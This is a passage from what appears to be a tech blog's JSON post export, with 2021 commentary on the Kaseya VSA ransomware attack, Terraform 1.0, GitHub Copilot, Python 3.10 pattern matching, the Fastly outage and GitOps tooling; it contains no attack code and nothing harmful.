ransomware payload to all managed endpoints, and watch as hundreds of businesses per MSP instance go dark simultaneously. Kaseya estimates that around 60 of their MSP customers were directly compromised, but each of those MSPs manages dozens to hundreds of downstream organizations.\nWhy MSPs Are the Perfect Target # I\u0026rsquo;ve been warning about the MSP supply chain risk for years, and this attack validates those concerns in the worst possible way.\nMSPs occupy a uniquely privileged position in the security landscape. They have administrative access to their clients\u0026rsquo; networks, the ability to deploy software across all managed endpoints, and — critically — they\u0026rsquo;re often trusted implicitly by their clients\u0026rsquo; security tools. Antivirus exclusions for the RMM agent are standard practice. Firewall rules allowing RMM traffic are standard practice. The MSP\u0026rsquo;s toolchain operates with the kind of deep, persistent access that would be a red flag in any other context.\nThis isn\u0026rsquo;t a flaw in the MSP model per se — it\u0026rsquo;s inherent to how remote management works. But it means that compromising an MSP gives an attacker the same access that the MSP has: administrative control over every client environment. The force multiplication is staggering.\nWhat makes this attack especially concerning is that many of the affected businesses are small operations — dental offices, accounting firms, small retailers — that don\u0026rsquo;t have the technical sophistication to even understand what happened, let alone recover from it. They hired an MSP precisely because they couldn\u0026rsquo;t manage IT themselves. Now their trust in that outsourcing model has been weaponized against them.\nThe Patch That Almost Was # Here\u0026rsquo;s a detail that makes this story even more frustrating: Kaseya was in the process of patching these vulnerabilities when the attack occurred. The Dutch Institute for Vulnerability Disclosure (DIVD) had discovered the flaws and was working with Kaseya on a responsible disclosure and remediation timeline. REvil apparently discovered the same vulnerabilities independently — or through other means — and exploited them before the patches could be deployed.\nThis highlights a tension in vulnerability disclosure that the security community has debated for decades. Responsible disclosure gives vendors time to fix issues, but that window is also a window of exposure. If multiple parties can find the same vulnerability, the assumption that attackers don\u0026rsquo;t know about it until the CVE is published is dangerously naive.\nFor VSA on-premises customers, Kaseya\u0026rsquo;s immediate guidance was to shut down VSA servers entirely until a patch was available. As I write this, those servers have been offline for nearly a week, meaning the MSPs that depend on them have been managing client infrastructure manually — or not at all — for days. The operational impact extends well beyond the ransomware itself.\nWhat This Means for Software Supply Chains # The Kaseya attack, combined with SolarWinds, the Codecov breach, and the various npm supply chain attacks we\u0026rsquo;ve seen, establishes a clear pattern: attackers are systematically targeting the tools and platforms that have privileged access to many downstream environments.\nThis has concrete implications for how we evaluate and deploy management tools:\nAssume your management plane is a target: Any tool with administrative access across multiple environments needs to be treated as critical infrastructure. That means aggressive patching, network segmentation, monitoring for anomalous behavior, and — where possible — zero-trust principles applied to the management plane itself.\nEvaluate MSP security posture: If you\u0026rsquo;re using an MSP, you need to understand their security practices in detail. What tools do they use? How are those tools patched? What\u0026rsquo;s their incident response plan? The uncomfortable truth is that most MSP contracts don\u0026rsquo;t include meaningful security guarantees or audit rights.\nDefense in depth for managed endpoints: Endpoints shouldn\u0026rsquo;t rely solely on the management tool chain for security. Independent endpoint detection and response (EDR), network-level monitoring that\u0026rsquo;s not controlled by the MSP, and offline backup strategies that can\u0026rsquo;t be reached through the management plane are all essential.\nSoftware bill of materials: Understanding what software is running in your environment — and what access it has — is no longer optional. The push for SBOM standards and supply chain transparency that accelerated after SolarWinds just got another powerful argument in its favor.\nMy Take # Every few months, we get another supply chain attack that\u0026rsquo;s described as a \u0026ldquo;wake-up call.\u0026rdquo; SolarWinds was a wake-up call. The Codecov breach was a wake-up call. At some point, we have to acknowledge that we\u0026rsquo;ve been hitting snooze.\nThe fundamental problem isn\u0026rsquo;t that Kaseya had vulnerabilities — all software has vulnerabilities. The problem is that our industry has built architectures where a single vulnerability in a single management tool can cascade to 1,500 businesses simultaneously. We\u0026rsquo;ve optimized for efficiency and convenience in ways that create catastrophic blast radiuses.\nI don\u0026rsquo;t have a clean answer for the small dental office in Sweden that just lost access to all their patient records. The technical solutions — better segmentation, independent monitoring, tested backups — are things they hired an MSP specifically to handle. The MSP model needs to evolve to address these risks, but that evolution costs money, and the MSP market is brutally competitive on price.\nWhat I do know is that every organization, regardless of size, needs to ask a simple question: \u0026ldquo;If the tool we use to manage our infrastructure is compromised, what happens?\u0026rdquo; If the answer is \u0026ldquo;everything is destroyed,\u0026rdquo; your architecture has a problem that no single vendor\u0026rsquo;s patch can fix.\nThe Fourth of July weekend is over. The cleanup is just beginning. And somewhere, the next supply chain target is running unpatched.\n","date":"8 July 2021","externalUrl":null,"permalink":"/posts/210708-kaseya-vsa-supply-chain-ransomware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The REvil ransomware group exploited Kaseya’s VSA platform to hit over 1,500 businesses simultaneously. This is what supply chain attacks look like at scale.","title":"Kaseya VSA Attack — Supply Chain Ransomware Goes Nuclear","type":"posts"},{"content":"HashiCorp officially released Terraform 1.0 a few weeks ago, and it\u0026rsquo;s worth taking a moment to appreciate what this milestone represents. After seven years of development and a long sequence of 0.x releases that sometimes introduced breaking changes, the tool that defined infrastructure as code for an entire generation of engineers is finally declaring itself stable. This stability commitment would later become contentious when licensing changes occurred.\nIf you\u0026rsquo;ve been managing infrastructure for any significant period, you know how unusual this is. Terraform has been production-ready for years — I\u0026rsquo;ve been using it in production since 0.6 — but the 1.0 designation carries a specific promise: backward compatibility and a stable foundation to build on.\nWhat 1.0 Actually Means # Let\u0026rsquo;s be precise about what Terraform 1.0 promises and what it doesn\u0026rsquo;t. The compatibility guarantee covers:\nState file format stability: Terraform 1.x will be able to read state files created by any other 1.x version. If you\u0026rsquo;ve ever dealt with the pain of state file migrations between 0.x versions, this alone is worth celebrating. I\u0026rsquo;ve lost entire weekends to state file format changes that required careful surgery to resolve.\nConfiguration language stability: The HCL-based configuration syntax won\u0026rsquo;t have breaking changes. Your existing .tf files will continue to work across 1.x releases. New features may be added, but nothing will be removed or changed in a way that breaks existing configurations.\nCLI workflow stability: The core commands — init, plan, apply, destroy — maintain their behavior and flag interfaces. Automation scripts that wrap Terraform won\u0026rsquo;t need rewrites.\nWhat 1.0 does not promise is provider stability. Providers — the plugins that interface with AWS, Azure, GCP, and hundreds of other services — are independently versioned and can still introduce breaking changes. This is actually the right design decision. Cloud providers change their APIs constantly, and tying provider stability to core Terraform stability would either slow down provider development or force premature stability guarantees.\nThe Journey to 1.0 # For those who haven\u0026rsquo;t been following the trajectory, the path to 1.0 was paved by several significant releases. This maturation process mirrors the infrastructure ecosystem\u0026rsquo;s broader evolution:\nTerraform 0.12 (2019) was the biggest transformation, introducing first-class expressions, rich type constraints, and for_each — features that eliminated most of the ugly workarounds we\u0026rsquo;d accumulated over years of HCL1. The 0.12 upgrade was painful for large codebases, but the language became dramatically more capable. This pattern of stabilization then followed by disruption would repeat with OpenTOFU when licensing changed.\nTerraform 0.13 brought module dependency improvements and required provider configurations that reduced the \u0026ldquo;works on my machine\u0026rdquo; problems that plagued team environments.\nTerraform 0.14 and 0.15 were the stability releases — refining the provider installation experience, improving the plan output, and generally polishing rough edges without introducing major breaking changes.\nBy the time 1.0 arrived, most active Terraform users were already on 0.15, and the upgrade path is intentionally trivial. HashiCorp designed the 0.14 → 0.15 → 1.0 progression to be as smooth as possible, learning from the pain of the 0.11 → 0.12 migration.\nThe State of the IaC Landscape # Terraform 1.0 arrives in an infrastructure as code landscape that\u0026rsquo;s more competitive than ever, and the stability guarantee is partly a strategic move to consolidate Terraform\u0026rsquo;s position.\nPulumi has been gaining traction with its \u0026ldquo;real programming languages for infrastructure\u0026rdquo; approach. Using Python, TypeScript, or Go instead of HCL appeals to developers who don\u0026rsquo;t want to learn another DSL. The tradeoff is that general-purpose languages make it easier to write unmaintainable infrastructure code — loops within loops, complex conditionals, abstractions that obscure intent. HCL\u0026rsquo;s constraints are a feature, not a limitation, for infrastructure management.\nAWS CDK has a strong following in AWS-only shops. If your infrastructure is entirely on AWS, the CDK\u0026rsquo;s tight integration is compelling. But multi-cloud is an operational reality for most enterprises I work with, and CDK\u0026rsquo;s AWS-centric worldview is a significant limitation.\nCrossplane is interesting for Kubernetes-native shops, extending the Kubernetes resource model to cloud infrastructure. It\u0026rsquo;s the right approach if your team already thinks in Kubernetes terms, but it\u0026rsquo;s still maturing.\nTerraform\u0026rsquo;s advantage remains its ecosystem breadth. With over 1,700 providers and a module registry that covers most common patterns, the network effects are substantial. When you need to provision infrastructure across AWS, Azure, Cloudflare, Datadog, PagerDuty, and GitHub in a single workflow, nothing else comes close.\nPractical Implications for Teams # If you\u0026rsquo;re running Terraform in production, here\u0026rsquo;s what the 1.0 release means practically:\nUpgrade now if you haven\u0026rsquo;t: The 0.15 → 1.0 upgrade is the easiest in Terraform\u0026rsquo;s history. There are no configuration language changes, no state file migrations, and no workflow changes. Run terraform init -upgrade, validate your plans, and you\u0026rsquo;re done.\nLock your provider versions: With core Terraform stabilized, provider version management becomes your primary concern. Use the required_providers block with version constraints in every module. Don\u0026rsquo;t use \u0026gt;= without an upper bound — use ~\u0026gt; to constrain to the minor version.\nInvest in module structure: Stability means your investment in modules has a longer shelf life. If you\u0026rsquo;ve been deferring a refactor of your Terraform code because you were waiting for things to settle down, the settling has happened. Now is the time to build proper module hierarchies, implement consistent tagging strategies, and establish conventions that will last.\nConsider Terraform Cloud or Enterprise: HashiCorp has been steadily improving their hosted offering, and with 1.0 stability, the managed state backend, policy enforcement via Sentinel, and the private module registry become more compelling investments. The free tier of Terraform Cloud covers most small team needs.\nMy Take # I\u0026rsquo;ve watched Terraform grow from a scrappy alternative to CloudFormation into the de facto standard for infrastructure as code. The 1.0 release doesn\u0026rsquo;t change what Terraform is — it\u0026rsquo;s been production-ready for years. What it changes is the implicit contract with users. \u0026ldquo;We will not break your workflow\u0026rdquo; is a powerful promise for a tool that manages critical infrastructure.\nThe thing I appreciate most about how HashiCorp handled this release is the honesty. They didn\u0026rsquo;t rush to 1.0 to hit a marketing milestone. They spent two years in the 0.13-0.15 range, systematically eliminating rough edges and ensuring the upgrade path was smooth. That patience reflects an understanding of how disruptive breaking changes are for infrastructure tooling specifically — unlike application code, you can\u0026rsquo;t just roll back a Terraform upgrade if it breaks your state file.\nFor teams still running 0.12 or earlier: this is your signal to upgrade. The longer you wait, the more painful the migration. For everyone else, enjoy the stability. It\u0026rsquo;s been a long time coming.\n","date":"1 July 2021","externalUrl":null,"permalink":"/posts/210701-terraform-1-0-infrastructure-as-code-milestone/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"After years of 0.x releases, Terraform hits 1.0 with stability guarantees. What this means for the IaC ecosystem and your existing workflows.","title":"Terraform 1.0 — Infrastructure as Code Reaches a Milestone","type":"posts"},{"content":"GitHub dropped a bombshell this week. Copilot, their new AI pair programming tool built on OpenAI\u0026rsquo;s Codex model, moved into technical preview. It sits in your VS Code editor and suggests entire functions, code blocks, and algorithms based on comments and context. This represents the next evolution in GitHub\u0026rsquo;s platform consolidation, extending far beyond simple code hosting. I got access to the preview a few days ago, and I\u0026rsquo;ve been alternating between being genuinely impressed and deeply concerned.\nLet me be upfront: this is the most significant change to the developer workflow I\u0026rsquo;ve seen since the introduction of intelligent code completion in IDEs. Whether it\u0026rsquo;s a net positive depends on questions we don\u0026rsquo;t have answers to yet.\nHow It Works # Copilot is powered by OpenAI Codex, a descendant of GPT-3 that\u0026rsquo;s been fine-tuned on publicly available code from GitHub repositories. When you type a comment describing what you want, or start writing a function signature, Copilot generates suggestions for the implementation. It can produce entire functions, handle boilerplate, write tests, and even generate regex patterns from natural language descriptions.\nThe model understands context — it reads the surrounding code, imports, variable names, and comments to produce suggestions that fit your codebase\u0026rsquo;s style. In practice, this means the suggestions get better the more context you provide. A well-documented codebase with clear naming conventions gets significantly better suggestions than a greenfield file.\nThe technical implementation is a cloud-based service — your code context is sent to GitHub\u0026rsquo;s servers, processed by the model, and suggestions are returned. This happens in near-real-time as you type, similar to how autocomplete works in Google Docs. The latency is noticeable but not disruptive on a decent connection.\nWhat It Does Well # After several days of use, I\u0026rsquo;m comfortable saying Copilot genuinely excels in specific scenarios.\nBoilerplate and glue code: Writing CRUD operations, setting up HTTP handlers, implementing standard interfaces — Copilot handles these almost perfectly. It\u0026rsquo;s the code you\u0026rsquo;ve written a thousand times, and having an AI generate it from a function signature saves real time.\nLanguage translation: I described an algorithm in a comment and Copilot generated Python implementations that I\u0026rsquo;d estimate were correct about 70% of the time for straightforward algorithms. For utility functions — sorting, string manipulation, date formatting — it\u0026rsquo;s remarkably reliable.\nAPI usage patterns: When working with well-documented libraries like pandas, requests, or Flask, Copilot generates usage patterns that are usually correct and idiomatic. It\u0026rsquo;s essentially distilled the collective patterns of millions of developers who\u0026rsquo;ve used these libraries before you.\nTest generation: Write a function, then start writing a test file for it, and Copilot will suggest test cases that cover common edge cases. This was genuinely surprising — it produced test cases I might have missed in a first pass.\nWhere It Falls Short # The failure modes are instructive because they reveal what the model actually is — a very sophisticated pattern matcher, not a reasoning engine.\nComplex business logic: Ask Copilot to implement anything that requires understanding domain-specific rules, and it starts generating plausible-looking but incorrect code. It doesn\u0026rsquo;t understand your business; it understands code patterns. There\u0026rsquo;s a crucial difference.\nSecurity-sensitive code: This is my biggest concern. Copilot will happily generate code with SQL injection vulnerabilities, hardcoded credentials in example patterns, and authentication flows with subtle flaws. It\u0026rsquo;s learned from the vast corpus of GitHub code, and frankly, a lot of that code has security issues. The model reproduces common patterns, including common mistakes.\nSubtle algorithmic errors: For anything beyond standard algorithms, Copilot produces code that looks correct at a glance but has off-by-one errors, incorrect boundary conditions, or wrong assumptions about data types. The code compiles, the happy path works, but the edge cases fail silently.\nThe Legal and Ethical Minefield # Beyond the technical assessment, Copilot raises questions that GitHub hasn\u0026rsquo;t adequately addressed.\nThe model was trained on public GitHub repositories, including those under copyleft licenses like GPL. If Copilot reproduces substantial portions of GPL-licensed code in your proprietary project — and researchers have already shown it can reproduce verbatim snippets — the licensing implications are entirely unclear. GitHub\u0026rsquo;s position appears to be that this constitutes fair use, but that hasn\u0026rsquo;t been tested in court.\nThere\u0026rsquo;s also the question of code ownership. If Copilot generates a function for you, who owns that code? You? GitHub? The original authors whose code trained the model? Microsoft\u0026rsquo;s terms of service claim you own the output, but the legal landscape around AI-generated content is unsettled territory.\nFor any organization working on proprietary software, these questions need answers from your legal team before you adopt Copilot broadly. The productivity gains aren\u0026rsquo;t worth a licensing lawsuit.\nThe Code Quality Concern # Here\u0026rsquo;s what worries me most as someone who\u0026rsquo;s spent decades advocating for code quality: Copilot optimizes for code that looks right, not code that is right. The suggestions are syntactically valid and pattern-consistent, but they lack understanding. This echoes broader concerns about code security and supply chain attacks — adding a new vector where subtle vulnerabilities can be introduced through automated tools.\nA junior developer who accepts Copilot suggestions without careful review is going to introduce subtle bugs at a rate that exceeds what they\u0026rsquo;d produce writing code from scratch. At least when you write code yourself, you\u0026rsquo;re forced to think through the logic. Copilot removes that friction, and friction in programming isn\u0026rsquo;t always bad — it\u0026rsquo;s often where understanding happens.\nSenior developers who can critically evaluate every suggestion will benefit most. They have the experience to spot when Copilot\u0026rsquo;s output is subtly wrong. Ironically, the developers who need Copilot least are the ones best equipped to use it.\nMy Take # Copilot is genuinely impressive technology. It\u0026rsquo;s also genuinely dangerous technology if used carelessly. I don\u0026rsquo;t think it\u0026rsquo;s going to replace programmers — not this version, not the next few versions. But it is going to change what programming looks like on a daily basis.\nMy recommendation: if you get access to the preview, use it. But use it the way you\u0026rsquo;d use Stack Overflow suggestions — as a starting point that requires validation, not as a source of truth. Review every suggestion. Test the edge cases. And for the love of everything, don\u0026rsquo;t accept security-sensitive code suggestions without thorough review.\nThe era of AI-assisted coding has arrived. How well it goes depends entirely on how disciplined we are about using it. Given this industry\u0026rsquo;s track record with \u0026ldquo;move fast and break things,\u0026rdquo; I\u0026rsquo;m cautiously pessimistic. But I\u0026rsquo;d love to be wrong.\n","date":"24 June 2021","externalUrl":null,"permalink":"/posts/210624-github-copilot-ai-pair-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s Copilot uses OpenAI Codex to autocomplete entire functions. After a week with the technical preview, here’s what developers need to understand.","title":"GitHub Copilot — AI Pair Programming Arrives, For Better or Worse","type":"posts"},{"content":"Python 3.10 beta 3 is out, and while the release candidate phase is approaching, one feature has dominated the conversation: structural pattern matching via the new match/case statements (PEP 634, 635, and 636). Having spent the past few weeks experimenting with the beta, I\u0026rsquo;m convinced this is the most consequential addition to Python\u0026rsquo;s syntax since f-strings landed in 3.6 — and possibly since generators in 2.3.\nIf you\u0026rsquo;ve been following the PEP discussions, you know this feature generated significant controversy. Python has always prided itself on \u0026ldquo;one obvious way to do things,\u0026rdquo; and critics argue that pattern matching overlaps with existing if/elif chains. After actually using it, I think they\u0026rsquo;re wrong. Let me explain why.\nBeyond Switch Statements # The most common misconception is that match/case is Python\u0026rsquo;s version of C\u0026rsquo;s switch statement. It\u0026rsquo;s not. That framing completely undersells what structural pattern matching brings to the table.\nYes, you can use it for simple value matching:\nmatch status_code: case 200: handle_success() case 404: handle_not_found() case _: handle_other() But that\u0026rsquo;s the least interesting use case. The real power emerges when you match on structure — decomposing complex data types and binding variables in a single, readable expression:\nmatch command: case {\u0026#34;action\u0026#34;: \u0026#34;move\u0026#34;, \u0026#34;direction\u0026#34;: str(d), \u0026#34;distance\u0026#34;: int(n)}: move(d, n) case {\u0026#34;action\u0026#34;: \u0026#34;resize\u0026#34;, \u0026#34;width\u0026#34;: int(w), \u0026#34;height\u0026#34;: int(h)}: resize(w, h) case {\u0026#34;action\u0026#34;: \u0026#34;quit\u0026#34;}: shutdown() This is matching on the shape of a dictionary, extracting typed values, and binding them to variables — all in one statement. Try doing that cleanly with if/elif chains. You\u0026rsquo;ll end up with nested conditionals, isinstance() calls, and temporary variables scattered everywhere.\nWhere Pattern Matching Shines # After working with it for a few weeks, I\u0026rsquo;ve found three areas where pattern matching dramatically improves code quality.\nAST and tree processing: If you work with parsed data structures — JSON APIs, configuration files, compiler internals, DOM-like trees — pattern matching is transformative. Walking a tree structure with pattern matching reads almost like a formal grammar specification:\nmatch node: case BinaryOp(left=Expression() as l, op=\u0026#34;+\u0026#34;, right=Literal(value=0)): return l # x + 0 optimization case BinaryOp(left=Literal(value=0), op=\u0026#34;+\u0026#34;, right=Expression() as r): return r # 0 + x optimization case BinaryOp(left=l, op=op, right=r): return BinaryOp(optimize(l), op, optimize(r)) Protocol/message handling: Any system that receives messages with varying structures — network protocols, event-driven architectures, command parsers — benefits enormously. Pattern matching replaces the kind of defensive, shape-checking code that accumulates in these handlers.\nState machines: Matching on (current_state, event) tuples produces state machine implementations that are almost self-documenting:\nmatch (state, event): case (State.IDLE, Event.START): return State.RUNNING case (State.RUNNING, Event.PAUSE): return State.PAUSED case (State.RUNNING, Event.COMPLETE): return State.DONE The Guard Clause Addition # One feature that doesn\u0026rsquo;t get enough attention is guard clauses — the ability to add if conditions to case patterns:\nmatch point: case Point(x, y) if x == y: print(\u0026#34;On the diagonal\u0026#34;) case Point(x, y) if x \u0026gt; 0 and y \u0026gt; 0: print(\u0026#34;First quadrant\u0026#34;) Guards bridge the gap between structural matching and conditional logic. Without them, you\u0026rsquo;d still need nested if statements inside case blocks for anything beyond simple structure matching. With them, pattern matching handles the full range of dispatch logic.\nThe Controversy: Is This Pythonic? # The Python community has been divided on this feature. The core argument against it: Python has always been readable to newcomers, and match/case introduces concepts (destructuring, binding, guards) that raise the learning curve.\nI understand the concern, but I think it\u0026rsquo;s misplaced. Python already has complex features — list comprehensions, decorators, context managers, async/await. Each one raised the learning curve, and each one made Python a better language because they replaced patterns that were more verbose and error-prone.\nThe real question isn\u0026rsquo;t whether pattern matching is simple — it\u0026rsquo;s whether the code it replaces was simple. And in my experience, the if/elif/isinstance chains that pattern matching replaces are anything but simple. They\u0026rsquo;re just familiar, which isn\u0026rsquo;t the same thing.\nThere\u0026rsquo;s also the \u0026ldquo;soft keyword\u0026rdquo; implementation detail worth noting: match and case are not reserved keywords. They\u0026rsquo;re context-sensitive, meaning existing code that uses match or case as variable names will continue to work. This was a pragmatic decision that avoids breaking existing codebases — the kind of careful backward compatibility that I\u0026rsquo;ve always appreciated about Python\u0026rsquo;s evolution.\nPerformance Considerations # One question I\u0026rsquo;ve been investigating is performance. Pattern matching isn\u0026rsquo;t just syntactic sugar over if/elif — the compiler can potentially optimize the dispatch. In the current beta, the performance is roughly comparable to equivalent if/elif chains for simple cases, and marginally better for complex structural matching because it avoids redundant attribute access.\nThat said, this is beta software, and I expect the CPython team will continue optimizing the bytecode generation for pattern matching in subsequent releases. The important thing is that it\u0026rsquo;s not slower than the alternative, which removes the performance objection.\nMy Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and I\u0026rsquo;ve watched every major syntax addition with a mix of excitement and skepticism. Pattern matching earned my enthusiasm faster than most.\nThe key insight is that this feature doesn\u0026rsquo;t add a new way to do something Python could already do easily. It adds a clean way to do something Python could only do clumsily. Destructuring nested data, dispatching on type and structure simultaneously, expressing complex matching logic declaratively — these are all things I\u0026rsquo;ve written ugly code to accomplish for years.\nIf you\u0026rsquo;re on a team that processes structured data, handles heterogeneous messages, or implements anything resembling a protocol parser, start experimenting with the 3.10 beta now. The migration path for existing if/elif dispatch code is straightforward, and the readability improvement is immediate.\nPython 3.10 isn\u0026rsquo;t just an incremental release. Structural pattern matching is a genuine leap forward in how we express logic in Python, and I suspect it\u0026rsquo;ll become as natural as list comprehensions within a couple of years.\n","date":"17 June 2021","externalUrl":null,"permalink":"/posts/210617-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s structural pattern matching is the most significant syntax addition since f-strings. Here’s why it matters and where it shines.","title":"Python 3.10 Beta — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"Two days ago, large portions of the internet went dark. Amazon, Reddit, the New York Times, the UK government\u0026rsquo;s gov.uk, Twitch, Stack Overflow — all unreachable. The culprit wasn\u0026rsquo;t a sophisticated cyberattack or a catastrophic hardware failure. It was a single valid configuration change deployed to Fastly\u0026rsquo;s CDN network that triggered an undiscovered software bug. The outage lasted roughly an hour, but the shockwaves will be felt far longer. This is exactly the kind of systemic failure scenario that engineers have been warning about for years.\nI\u0026rsquo;ve been working in this industry long enough to remember when we thought putting everything behind a CDN was the ultimate reliability play. And in most cases, it still is. But Tuesday\u0026rsquo;s incident is a stark reminder that abstracting complexity doesn\u0026rsquo;t eliminate it — it concentrates it.\nWhat Actually Happened # Fastly has been refreshingly transparent about the incident. A customer pushed a valid configuration change that triggered a bug in their software, which caused 85% of their network to return errors. Their engineering team identified the issue within minutes, and most services were restored within 49 minutes.\nLet\u0026rsquo;s be clear: a 49-minute detection-to-resolution time is genuinely impressive. Many organizations take longer to acknowledge an incident exists, let alone resolve one affecting global infrastructure. Fastly\u0026rsquo;s engineering team deserves credit for that.\nBut the root cause — a latent bug activated by a routine configuration change — is the kind of failure mode that should make every infrastructure engineer uncomfortable. This wasn\u0026rsquo;t an edge case or an unreasonable input. It was a normal customer action that happened to tickle a code path nobody had tested thoroughly enough.\nThe Concentration Problem # Here\u0026rsquo;s the uncomfortable architectural reality: we\u0026rsquo;ve traded distributed fragility for concentrated fragility. The old internet was unreliable in lots of small ways — individual servers went down, individual sites had issues. The modern internet is reliable almost all the time, but when it fails, it fails spectacularly because so much traffic flows through so few providers. The concentration of infrastructure dependencies means that single points of failure have massive blast radius.\nFastly, Cloudflare, and Akamai collectively handle an enormous percentage of web traffic. AWS, Azure, and GCP underpin most of the services behind those CDNs. The dependency graph of the modern internet looks less like a resilient mesh and more like an hourglass — millions of clients on one side, millions of origin servers on the other, and a surprisingly small number of infrastructure providers in the middle.\nI\u0026rsquo;ve had this conversation with clients dozens of times: \u0026ldquo;What\u0026rsquo;s your disaster recovery plan if your CDN goes down?\u0026rdquo; The typical answer is a blank stare. We\u0026rsquo;ve internalized the assumption that these services are essentially utilities — always available, like electricity. But even electricity grids have redundancy built in at multiple levels. Most web architectures have a single CDN provider and no fallback. The lessons apply everywhere: infrastructure resilience requires planning for systemic failures.\nWhat This Means for Architecture Decisions # If you\u0026rsquo;re running anything where availability matters — and let\u0026rsquo;s be honest, that\u0026rsquo;s most things — this outage should prompt some concrete architectural questions:\nMulti-CDN strategies: Running traffic through multiple CDN providers with DNS-level failover is technically feasible but operationally complex. You\u0026rsquo;re managing configuration, cache invalidation, and SSL certificates across multiple platforms. The cost is real, but for critical services, it\u0026rsquo;s worth evaluating. Companies like Citrix (NetScaler) and NS1 offer intelligent DNS routing that can detect CDN failures and redirect traffic.\nOrigin resilience: Can your origin servers handle direct traffic if the CDN layer disappears? Many applications have scaled their origin infrastructure based on the assumption that the CDN absorbs 90%+ of the traffic. If that CDN layer vanishes, the origin gets crushed. Load testing without the CDN in the path is an exercise few teams perform but many should.\nGraceful degradation: Could your application serve a reduced experience directly? Static HTML fallback pages, service workers with cached content, progressive enhancement that doesn\u0026rsquo;t depend on a CDN for core functionality — these are patterns that existed before CDNs became ubiquitous, and they\u0026rsquo;re still valuable.\nMonitoring from the outside: If your monitoring infrastructure runs through the same CDN as your production traffic, you might not even know you\u0026rsquo;re down. External monitoring from diverse network paths isn\u0026rsquo;t optional for serious production systems.\nThe Software Bug Angle # Beyond the architectural conversation, there\u0026rsquo;s a software quality story here. Fastly runs Varnish Configuration Language (VCL) that customers can customize extensively. The interaction between customer configurations and the underlying platform software creates a vast state space that\u0026rsquo;s genuinely difficult to test comprehensively.\nThis is a pattern I see repeatedly in platform engineering: the more flexibility you give users, the harder it is to guarantee that every possible combination of valid inputs produces correct behavior. It\u0026rsquo;s the configuration-as-code challenge writ large. Every configuration option multiplies the testing surface. Every customer-facing knob is a potential trigger for an untested interaction.\nFastly will fix this specific bug, undoubtedly. But the class of bug — latent defects triggered by valid configuration changes — is essentially unsolvable through testing alone. It requires defense-in-depth: canary deployments for configuration changes, blast radius limitation, circuit breakers that prevent a single bad configuration from propagating globally.\nMy Take # I don\u0026rsquo;t think this outage means you should abandon CDNs or start building everything on bare metal. The reliability gains from CDN infrastructure are real and significant. What it does mean is that we need to stop treating any single infrastructure provider as infallible.\nThe internet was designed to route around damage. Somewhere along the way, we built an application layer that routes everything through the same handful of chokepoints. That\u0026rsquo;s not a CDN problem — it\u0026rsquo;s an architecture problem. And it\u0026rsquo;s one we\u0026rsquo;ve collectively chosen because it\u0026rsquo;s cheaper and simpler than true redundancy.\nFor most of my clients, the pragmatic takeaway is this: understand your CDN dependency, have a documented (and tested) plan for when it fails, and make sure your monitoring can actually detect the failure. That won\u0026rsquo;t prevent the next outage, but it\u0026rsquo;ll make the difference between a 49-minute inconvenience and a 49-minute crisis.\nThe internet isn\u0026rsquo;t as resilient as we like to pretend. Tuesday made that impossible to ignore.\n","date":"10 June 2021","externalUrl":null,"permalink":"/posts/210610-fastly-cdn-outage-single-points-failure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"When a single configuration change at Fastly took down half the internet, it exposed uncomfortable truths about how we build on CDN infrastructure.","title":"The Fastly Outage — A Masterclass in Single Points of Failure","type":"posts"},{"content":"The CNCF (Cloud Native Computing Foundation) recently accepted Argo into its incubation stage — and while the formal announcement was back in March, the implications are really sinking in now as the ecosystem coalesces around GitOps as a standard deployment paradigm. Combined with Flux v2 reaching production readiness and the formation of the GitOps Working Group under the CNCF\u0026rsquo;s App Delivery TAG, we\u0026rsquo;re watching GitOps transition from a trendy concept to an industry standard. This complements the Kubernetes 1.21 maturation where the platform itself is stabilizing into production-ready form.\nWhat GitOps Actually Means (and Doesn\u0026rsquo;t) # GitOps, a term coined by Weaveworks back in 2017, boils down to a deceptively simple principle: Git is the single source of truth for your infrastructure and application state. Your desired state lives in a Git repository, and an automated process continuously reconciles the actual state of your system with what\u0026rsquo;s declared in Git.\nThis sounds obvious, and many teams think they\u0026rsquo;re already doing GitOps because they store their Kubernetes manifests in Git and have a CI pipeline that runs kubectl apply. But there\u0026rsquo;s a crucial distinction between CI-driven deployment (push-based) and true GitOps (pull-based).\nIn CI-driven deployment, your CI pipeline pushes changes to your cluster. The pipeline needs cluster credentials, the deployment happens imperatively, and if someone manually changes something in the cluster, there\u0026rsquo;s no mechanism to detect or correct the drift.\nIn a GitOps model, an agent inside the cluster (ArgoCD, Flux) continuously watches the Git repository and pulls changes. If the cluster state drifts from what\u0026rsquo;s in Git — whether through manual changes, failed deployments, or infrastructure issues — the agent automatically reconciles back to the desired state. This is the fundamental shift: from \u0026ldquo;deploy and hope\u0026rdquo; to \u0026ldquo;declare and converge.\u0026rdquo; This declarative approach mirrors Terraform\u0026rsquo;s infrastructure-as-code philosophy.\nArgoCD: Why It\u0026rsquo;s Winning Hearts # I\u0026rsquo;ve been running ArgoCD in production for about eight months now, and it\u0026rsquo;s earned every bit of its growing popularity. The project has over 7,000 GitHub stars and is used in production by organizations ranging from startups to enterprises like Intuit (where the Argo project originated).\nWhat makes ArgoCD compelling as a GitOps operator:\nThe UI is genuinely useful. Unlike many Kubernetes tools where the dashboard is an afterthought, ArgoCD\u0026rsquo;s web interface provides real-time visualization of your application\u0026rsquo;s resource tree, sync status, and health. When a deployment goes wrong, you can see exactly which resource failed and why, without switching to a terminal.\nMulti-cluster management works well. We manage four clusters through a single ArgoCD instance, and the experience is clean. Each application declares its target cluster, and ArgoCD handles the rest. This is invaluable for organizations running separate staging, production, and regional clusters.\nThe Application CRD model is elegant. You define an ArgoCD Application that points to a Git repository path and a target cluster/namespace. That\u0026rsquo;s it. ArgoCD handles sync, health checking, pruning of removed resources, and rollback. The ApplicationSet controller extends this further, allowing you to template applications across multiple clusters or environments from a single definition.\nHelm and Kustomize integration is first-class. ArgoCD natively understands Helm charts and Kustomize overlays, which means you don\u0026rsquo;t have to pre-render your templates in CI. It renders at sync time, so the Git repository contains the actual source templates rather than rendered output.\nFlux v2: The Composable Alternative # While ArgoCD takes a monolithic approach (one tool that does everything), Flux v2 takes a deliberately composable approach built on a 